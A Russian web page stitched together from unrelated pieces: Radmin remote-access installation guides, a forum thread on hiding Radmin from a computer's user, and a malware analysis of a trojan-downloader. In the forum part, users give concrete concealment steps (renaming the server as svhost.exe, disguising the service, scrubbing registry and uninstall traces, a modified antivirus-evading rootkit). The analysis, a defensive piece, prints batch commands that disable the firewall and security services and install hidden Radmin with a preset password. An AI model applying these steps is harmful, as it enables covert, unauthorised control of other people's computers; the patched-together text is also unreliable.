Дневник megavtogal.com

МЕНЮ
  • Контакты
  • Статьи

Скрытый radmin windows 10

Обновлено: 23.01.2025


Программа для удаленного доступа к компьютеру Radmin (Remote Administrator) проста в установке и настройке. Несмотря на лаконичный интерфейс ПО имеет хороший функционал и работает без проблем даже при медленном Интернет-соединении.

Используя инструкции по установке программного обеспечения, вы можете самостоятельно произвести инсталляцию. Для того чтобы установка Radmin прошла успешно, рекомендуем вам ознакомиться с инструкцией по установке. ПО для внешнего управления Radmin 3 купить вы можете в SoftMagazin по лучшей цене.

Установка Radmin по сети

Удаленная установка Radmin производится при помощи специальной утилиты Radmin Deployment, которая включает в себя модули Radmin Activation Server и Radmin Deployment Tool. Сервер активации обеспечивает автоматическое активирование Activation Server сразу на нескольких ПК, даже при наличии ограниченного Интернет-соединения.

Благодаря Deployment Tool вы можете выполнять системные действия, такие как установка, обновление или удаление сервера активации на других компьютерах в локальной сети. В составе утилиты присутствует компонент MSI Configurator. Он позволяет вносить необходимые изменения еще на этапе инсталляции.

Установка Radmin через групповую политику

Установка Radmin через групповую политику

Для того чтобы устанавливать программу через групповую политику, нужен установочный пакет, лицензию на который необходимо приобрести. Если инсталляционный файл находится на компьюетере, можно начинать установку. Обратите внимание, что необходим именно пакет для удаленной установки, так как он имеет расширение msi. Без данного формата вы не сможете установить ПО через групповую политику.

Данный формат файла также удобен тем, что можно просто настраивать установочный пакет под нужды вашего офиса непосредственно на этапе установки. Необходимые изменения производятся при помощи утилиты Radmin MSI Configurator. После конфигурирования файла его необходимо будет прописать в политике домена.

Установка Radmin Server

Radmin Server – это компонент ПО, который необходимо устанавливать на персональном компьютере, к которому нужно получить удаленный доступ. Чтобы программа работала, оба устройства должны иметь соединение через протокол TCP/IP, через Интернет, локальную сеть или модем. Откройте установочный файл и пошагово следуйте инструкциям мастера установки. После успешной инсталляции нужно изменить права доступа через «Настройки Radmin Server».

При настройке вам необходимо будет добавить учетную запись пользователя в систему безопасности. В противном случае соединение с удаленным компьютером будет невозможно. Не забудьте выбрать вид системы безопасности: Windows NT или установленную по умолчанию Radmin. В окне системы безопасности будет отображен список прав пользователей, из которых вы можете выбрать необходимые. После завершения настроек запишите IP вашего ПК.

Установка Radmin Server

Скрытая установка Radmin

В официальной инструкции по установке продукта Radmin (Remote Administrator) нет какой-либо информации о скрытой установке ПО. Для того чтобы установить программу для удаленного доступа к ПК используйте пошаговую установку, описанную на сайте утилиты.

Тихая установка Radmin Server

В официальной инструкции по установке модуля Radmin Server нет какой-либо информации о скрытой установке ПО. Для того чтобы установить программу для удаленного доступа к ПК используйте пошаговую установку, описанную на сайте утилиты.

Куда устанавливается Radmin Server

Radmin Server устанавливается на компьютер, к которому необходим удаленный доступ. Сама установка не займет много времени, так как выполняется последовательно с подробными инструкциями в окне проводника.

При инсталляции все файлы программы копируются на диск C в системную директорию. По умолчанию путь к ПО - C:\WINDOWS\system32\rserver35\. Если на вашем ПК существует старая версия программного обеспечения Radmin, ее файлы будут заменены новыми. При этом, все настройки будут сохранены.

Radmin - удаленное администрирование и управление ПК с Windows

Radmin – программа для удаленного администрирования ПК для платформы Windows российской компании Фаматек.

Содержание

Системные требования

Radmin Server 3.5 поддерживает: Windows 8/7/Vista/XP/2008R2/2008/2003/2000 (32-bit, 64-bit)

Radmin Viewer 3.5 поддерживает: Windows 8/7/Vista/XP/2008/2003/2000/NT4.0/98/ ME/95 (32-bit, 64-bit)

Radmin 3.5 полностью поддерживает Windows 8, Windows 7 и Windows Vista 32-bit и 64-bit, включая управление пользовательскими аккаунтами и быстрое переключение пользователей. Radmin Server 3.5 поддерживает операционные системы Windows 8/7/Vista/XP/ 2012/2008/2003/2000 (32-bit) и Windows 8/7/Vista/XP/ 2012/2008/2003 (64-bit). Radmin Viewer 3.5 поддерживает операционные системы Windows 8/7/Vista/XP/2012/2008/ 2003/2000/ME/98/95/NT4.0 (32-bit) и Windows 8/7/Vista/XP/ 2012/2008/2003 (64-bit).

Структура Radmin

Программа Radmin состоит из двух модулей – сервер и клиент. Серверная часть устанавливается на тот компьютер, к которому необходимо получить удаленный доступ, клиентская - на компьютер, с которого будет осуществляться удаленное администрирование.

Лицензируется только Radmin Server. Radmin Viewer является бесплатной программой, ее можно установить его на любой компьютер, с которого требуется удаленный доступ.

Количество подключений к одной копии программы Radmin Server в любом режиме (Управление, Просмотр, Чат, Telnet и "Соединение через") ограничено 5 одновременными подключениями. Это число можно увеличить приобретением лицензии на дополнительные подключения.

Цены Radmin

Лицензия

Описание

Цена, руб.

1 250 руб. за лицензию

Пакет из 50 лицензий

на 50 компьютеров

38 000 руб. за пакет

Пакет из 100 лицензий

на 100 компьютеров

63 500 руб. за пакет

Пакет из 150 лицензий

на 150 компьютеров

90 000 руб. за пакет

от 200 лицензий

от 550 руб. и ниже

Компания Фаматек предоставляет бесплатно лицензии Radmin для людей с ограниченными физическими возможностями.

Возможности Radmin

  • Удаленное управление компьютером в локальной сети и через Интернет;
  • Просмотр удаленного рабочего стола;
  • Передача файлов;
  • Текстовый и голосовой чат с удаленными пользователями и др.

Основные функции Radmin

  • Удаленная работа;
  • Оказание удаленной технической поддержки пользователям и клиентам;
  • Осуществление удаленного системного администрирования и др.

Инсталляция программного обеспечения Radmin

1. Установить Radmin Server 3.5 на первый компьютер, который будет выступать в качестве сервера:

- Запустить файл rserv35ru.exe

Рис.1 Диалоговое окна мастера установки Radmin

- В диалоговом окне мастера установки нажать кнопку Далее

- Установить радиокнопку в пункте Я принимаю условия лицензионного соглашения > Установить

- По окончании установки снять флажок в чекбоксе Настроить права доступа пользователей для Radmin Server и нажать Готово

При установке необходимые файлы будут скопированы в системную директорию по умолчанию (C:\WINDOWS\system32\rserver30).

2. Установить Radmin Viewer 3.5 на второй компьютер, который будет выступать к качестве клиента

  • Запустить файл rview35ru.exe
  • Следовать инструкциям на экране.

Настройка и администрирование средства удаленного администрирования Radmin

1. Открыть окно настроек Radmin Server одним из следующих способов:

- В зависимости от операционной системы Windows открыть Приложения > Radmin Server 3 и выбрать Настройки Radmin Server.

Рис.2 Окно запуска приложений OS Microsoft Windows 8.1

Рис.2 Окно запуска приложений OS Microsoft Windows 8.1

- Если иконка Radmin Server отображается в системном трее: щелкнуть иконку правой клавишей мыши и выбрать пункт меню Настройки Radmin Server.

- Открыть командную строку от имени администратора, перейти в директорию с программой (C:\WINDOWS\system32\rserver30) и запустить файл rserver3.exe с ключом командной строки /setup

Рис.3 Запуск настройки программы Radmin через командную строку

Рис.3 Запуск настройки программы Radmin через командную строку

2. Выбрать Режим запуска….

Режим запуска приложения может быть автоматическим и ручным. Во втором случае можно осуществлять старт приложения при клике по ее иконке, либо через командную строку, либо другим способом. Автоматический запуск позволяет запускать программу автоматически при загрузке Windows, подключаться к удаленному компьютеру даже в том случае, если в систему не вошел ни один пользователь.

  • Нажать кнопку Режим запуска;
  • Выбрать Автоматически;
  • Нажать кнопку ОК, чтобы сохранить выбор.

Добавление новых пользователей Radmin и назначение им прав доступа

1. Нажать кнопку Права доступа;

2. В окне Режим безопасности выбрать Radmin и нажать кнопку Права доступа;

Рис.4 Режим безопасности Radmin

3. В окне Система безопасности Radmin нажать кнопку Добавить;

4. В окне Добавление нового пользователя создать несколько пользователей с разыми паролями и правами.

Рис.5 Создание пользователей и назначение им прав

Настройка IP фильтрации

  1. Открыть НастройкиRadmin Server;
  2. Нажать кнопку Настройки;
  3. Открыть раздел IP фильтр;
  4. Установить флажок в чекбоксе Включить IP фильтрацию

Если IP фильтрация включена, и не указано IP адресов или диапазонов IP адресов, или адрес, с которого осуществляется подключение к Radmin Server, не входит в разрешенные диапазоны, то соединение с компьютером станет невозможным.

  1. Нажать кнопку Добавить;
  2. В окне Добавление IP адреса ввести IP адрес клиента;
  3. Нажать кнопку ОК.

Изменение порта

Можно изменить порт Radmin Server с порта по умолчанию (4899) на любой другой неиспользуемый порт в диапазоне от 1 до 65535. При этом убедиться, что в настройках Radmin Viewer на локальном компьютере указан такой же номер порта, как и в настройках Radmin Server на удаленном компьютере.

Использование журнала в файле

Radmin поддерживает два способа ведения журнала:

  1. Журнал событий Windows. Информация сохраняется в системном журнале событий и доступна через стандартное приложение Просмотр журналов событий.
  2. Журнал событий Radmin. Информация записывается в формате HTML. События сохраняются в C:\WINDOWS\system32\rserver30\Radm_log.htm

Рис.6 Журнал событий Radmin

  1. Открыть Настройки Radmin Server;
  2. Нажать кнопку Настройки;
  3. Открыть раздел Общие настройки;
  4. Установить флажок Использовать журнал событий Radmin;
  5. В области ввода под флажком указать путь и имя файла (если не указан);
  6. Нажать кнопку ОК.

Соединение с удаленным компьютером

1. Запустить Radmin Viewer на локальном компьютере;

2. Нажать на пиктограмму Соединение с адресом на панели инструментов (можно также выбрать в главном меню Соединение > Соединиться с);

3. Ввести IP адрес удаленного компьютера;

4. Изменить порт, в соответствии с используемыми настройками безопасности Radmin Server;

5. Указать нужный режим соединения;

6. Изменить качество цветопередачи и вид экрана в настройках Экран удаленного компьютера;

В режимах Управление и Просмотр изображение с экрана удаленного компьютера может иметь следующий вид:

  • Обычный (экран удаленного компьютера появляется в окне в масштабе 1:1. Размер окна можно изменять)
  • С масштабированием (экран удаленного компьютера появляется в окне, но при этом масштаб изображения будет соответствовать размеру окна. Размер окна можно изменять).
  • Полноэкранный (в этом режиме изображение с экрана удаленного компьютера займет весь экран локального компьютера. Если разрешение экрана удаленного компьютера больше, чем разрешение экрана локального компьютера, приближение курсора мыши к краю экрана позволяет перемещаться в соответствующую сторону).
  • Полноэкранный с масштабированием (в этом режиме экран удаленного компьютера будет показываться полностью на весь экран локального компьютера).

7. Нажать кнопку ОК;

8. Ввести имя пользователя и пароль, в соответствии с используемыми настройками безопасности Radmin Server;

9. Нажать кнопку ОК.

Экран удаленного компьютера отобразится в окне на экране локального компьютера.

Удаленная установка по сети

Утилита Radmin Deployment Tool обеспечивает установку Radmin Server удаленно с использованием MSI-файла, предварительно подготовленного в соответствии с требуемыми настройками. Утилита Radmin Deployment Tool состоит из двух модулей:

  • RadminDeploymentTool позволяет удаленно устанавливать, удалять и обновлять Radmin Server.
  • Radmin MSI Configurator позволяет изменить настройки Radmin Server на этапе подготовки MSI-файла к установке на удаленных компьютерах.

Системные требования программы Radmin Deployment Tool для локального компьютера:

  • Операционная система Microsoft Windows 8/Server 2012/7/Server 2008 R2/Vista/ Server 2008/XP/Server 2003/2000
  • 1000 МГц процессор
  • 512 Мб памяти (1024 Мб рекомендуется)
  • 150 Мб свободного места на жестком диске
  • Права администратора домена или права локального администратора

Системные требования программы Radmin Deployment Tool для удаленных компьютеров:

  • Операционная система Microsoft Windows 8/Server 2012/7/Server 2008 R2/Vista/ Server 2008/XP/Server 2003/2000
  • Должна быть запущена служба Удаленный реестр (по умолчанию в OS MS Windows 8 данная служба отключена, в OS MS Windows 7 запущена)
  • Возможность зайти под правами Администратора

Более подробную информацию о системных требованиях можно прочитать в справке к программе Radmin Deployment Tool в разделе Помощь.

2. Инсталлировать программу Radmin Deployment Tool (rdpltool12.msi)

3. Запустить Radmin Deployment tool

4. В главном меню выбрать Language > Russian

Рис.7 Radmin Deployment tool

5. Проверить, запущены ли удаленные компьютеры

6. Убедиться, что в дереве компьютеров программы Radmin Deployment tool доступны удаленные машины (Рис.7)

7. Если удаленные компьютеры не отображаются, произвести сканирование сети Entire Network > Сканирование сети

8. Если возле пиктограммы удаленного компьютера расположен красный значок в виде замка, проверить, запущена ли служба Удаленный реестр, правильно ли указан логин и пароль Администратора удаленного компьютера.

9. Запустить утилиту Radmin MSI Configurator

10. В диалоговом окне Specify a Radmin Server MSI ….. указать путь к файлу rserv35ru.msi

Рис.8 Radmin MSI Configurator

11. В следующем диалоговом окне нажать кнопку Settings…

12. Указать необходимые настройки для программы Radmin Server, которая будет инсталлирована на удаленный компьютер > Next

13. В следующем диалоговом окне нажать кнопку Security, в окне Radmin Server Security Mode (режим доступа) выбрать Radmin security и нажать кнопку Premissions (права доступа)

14. В окне Radmin Security (система безопасности Radmin) нажать кнопку Add User (добавить пользователя)

15. Создать несколько пользователей с разными паролями и правами

16. В следующем диалоговом окне сохранить сконфигурированный файл и нажать кнопку Exit.

17. Запустить Radmin Deployment Tool

18. Правой клавишей мыши выбрать удаленный компьютер и в контекстном меню выбрать Инсталлировать приложение, либо использовать комбинацию клавиш Ctrl + I

19. Указать путь к ранее сконфигурированному файлу

20. Для удаленной установки необходимо во всплывающем окне Альтернативные учетные записи ввести Имя пользователя и Пароль учетной записи, входящей в группу Администраторы удаленного компьютера.

21. Проверить, установилось ли приложение на удаленном компьютере (непосредственно на удаленном компьютере или через журнал Radmin Deployment tool локального компьютера).


Почитал ветки "как защититься от радмина". Возник контрвопрос.
А как этот радмин поныкать?

Идеи:
1) скрестить с подходящим руткитом.
(Как погиб Мичурин? Полез на клубнику за вишней, а его арбузами завалило.)

2) запустить как ядерную службу (? не уверен, что выйдет, может быть через srvany)

3) переименовать во что - то подходящее.

Кто этим занимался? Pls, поделитесь опытом.
В понедельник буду экспериментировать, что получится, отпишу.

Всё очень просто. При установке RA указываешь ему дирректорию для инсталла в system32 (там всго много и его файло просто затеряется в этой дирректории). Потом переименовываешь файл r_server в напр. в svhost.exe , в свойствах (настройках) радмина выставляешь фичу, чтобы скрыть системную иконку. В службах сервис Remote Administrator переименовываешь как напр. DNS-сервер, удаляешь из меню деинсталяции, чистишь реестр (все ветки) от ремутера, причём хочу заметить, что этим невозможно полностью убить радмина, а потому смело убивай всё, что с ним связанно, лишнее он сам не даст удалить =)
Затем машину в ребут и получает след. картину:

* По 3-м педалям у нас висит сервис svhost.exe (вместо r_sever), в службах какойто DNS-server, которого нет в Win2k и XP (есть только DNS Client, но для логичности мона переименовать сервис админа в DNS server )

* В меню деисталляции программ, Program Files и Главном меню, также следы жизнедеятельности RAdmin`a отсутствуют =)

Так что, вполне норманьный вариант для сокрытия работы этой программы. Если канешна копать глубже и профессиональнее, то ессно всё мона отрыть.. даже иголку в стоге сена =)

По поводу запихивания в ядро:
1) Изменение ранлевела ведет к незапускаемости службы
2) Через srvany тоже не выходит.

Остаются руткиты. Вот только подберу не палящийся.

settings.reg с настроенной машины из [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

ZOR, почитайте хелпы к радмину. Там все гораздо проще.
И в будущем внимательно читайте вопрос, перед тем, ткак отвечать: я спрашиваю, не как поставить радмин удаленно и незаметно, а как спрятать от юзера процесс, ветку реестра и открытый порт. :hul: Уже давно использую именно для этой цели такой руткит, как Hacker Defender (переделанный, чтоб антивирусы не беспокоить). Отлично прячет процесс и ветку. С портом посложнее - его все равно видно внешним сканером. и без переделки самого радмина вряд ли удастся сделать так, чтобы эти самые сканеры (тот же икс-спайдер) не могли установить, что там на этом порту стоит.
А если в svchost переименовывать, то лучше не переносить в другую папку из систем32, а просто буквы о или с заменить на русские.
Цитата

Hacker Defender (переделанный, чтоб антивирусы не беспокоить)

руткит прекрасный. особенно хорошо конфигурируется. и бэкдор у него без проблем с кодировкой, в отличие от того же радмина.

что и чем переделано? перекомпиливал? достаточно ли драйвера через lcc ? а то я ну совсем не пасквилист

антивирь находит участки, отвечающие за внедрение кода и хуков.

ЗЫ по поводу переименования

В dllcashe его. С sfc проблем быть не должно, тк. файл - то unsigned. А пути для себя служба пишет абсолютные. dll - ки в ту же папку.

:offtop:
Смотрит пьяный хакер на Нортон Коммондер: слева диск С: и справа диск С.
--- А нафига мне 2 диска С:
Взял и снес правый к едрене фене.


Оба упакованы в upx, после распаковки получим следующую картину:


filip_olegovich.exe — собранный в exe pdf-файл, он нас более не интересует.
setup.exe (md5:732FCAA243C007DAA9354AEAF3F6D572) — компиллятор PureBasic 4.x -> Neil Hodgson *, что свойственно для конвертора bat-файлов в исполняемые exe.

Пока оба варианта подозрительного файла загружаются на вирустотал, поглядим ресурсы распакованного setup.exe:


Да, это конвертированный батник, который создаст 2 файла и выполнит собственный бат код:

sc config schedule start= auto
sc start schedule

sc config wscsvc start= disabled
sc config SharedAccess start= disabled

sc stop wscsvc
sc stop SharedAccess

schtasks /create /tn «f» /sc minute /mo 1 /ru «NT AUTHORITY\SYSTEM» /tr %systemroot%/ff.bat

attrib +h %systemroot%/tasks/*.* netsh advfirewall set currentprofile state off
C:/isendsms_setup.exe


Этот батник запустит службу планировщика задач, остановит службы «центр обеспечения безопасности и оповещения системы безопасности» и «брэндмауэр windows» Далее добавит задание в планировщик, которое будет запускать файл ff.bat каждую минуту, скроет файл задания и снова отключит фаерволл. Разработчик или параноик или диллетант, скорее — второе. Проще говоря, этот файл setup.exe — экземпляр трояна- загрузчика (trojan-downloader), просто несколько импровизированный. Далее рассмотрим два указанных выше файла: Этот текст будет скопирован в %systemroot%/system.bin

%systemroot% — папка windows, в моем случае C:\windows

Этот параметр разархивирует в тихом режиме содержимое архива в %SYSTEMROOT%/help/win32



После распаковывания тем же самым раром получаем ни что иное, как сборку скрытого радмина второй версии: raddrv.dll и AdmDll.dll — драйвера Radmin 2

svchost.exe — исполняемый файл Radmin 2

Blat.* — файлы, пренадлежащие консольному почтовому клиенту blat

А вот эти файлы рассмотрим поподробней: install.bat

sc config wscsvc start= disabled
sc stop wscsvc

sc config SharedAccess start= disabled
sc stop SharedAccess

Разберем команды по порядку. Прежде всего очередное отключение брэндмауэра и оповещений безопасности, затем повторный запуск службы планировщика задач. Далее — самое вкусное, запуск серверной части Radmin с параметрами, включающими тихую установку, предустановленный пароль а так же запись в реестр параметров сокрытия значка в трее жертвы. Второй ключ задаст имя службы радмина — Service Host Controller

Ну и окончание — запуск самой службы. Таким образом на скомпрометированной системе установлен Radmin с предустановленным паролем и все возможным сокрытием. Далее мы видим запись в реестр данных для отправки почты с помощью почтового клиента blat и добавление всего этого бат-файла в автозагрузку через планировщик заданий. microsoft.bat

На этом, в общем-то, все, анализ закончен. Анализ совершенно статичен, запускать в виртуальной среде ничего не пришлось, все банально. Но тем не менее, зайдя на почту я видел большое количество писем с ip-адресами жертв. Ниже будет приведен скрипт AVZ для лечения системы.

Читайте также:

      
  • Как включить системные звуки в windows 10
    •   
  • Как отключить ф кнопки на ноутбуке виндовс 10
    •   
  • Godus не запускается на пк windows 10
    •   
  • Автоматическая очистка корзины windows 10
    •   
  • Возможно модуль msvcp120 dll не совместим с версией windows
  • Контакты
  • Политика конфиденциальности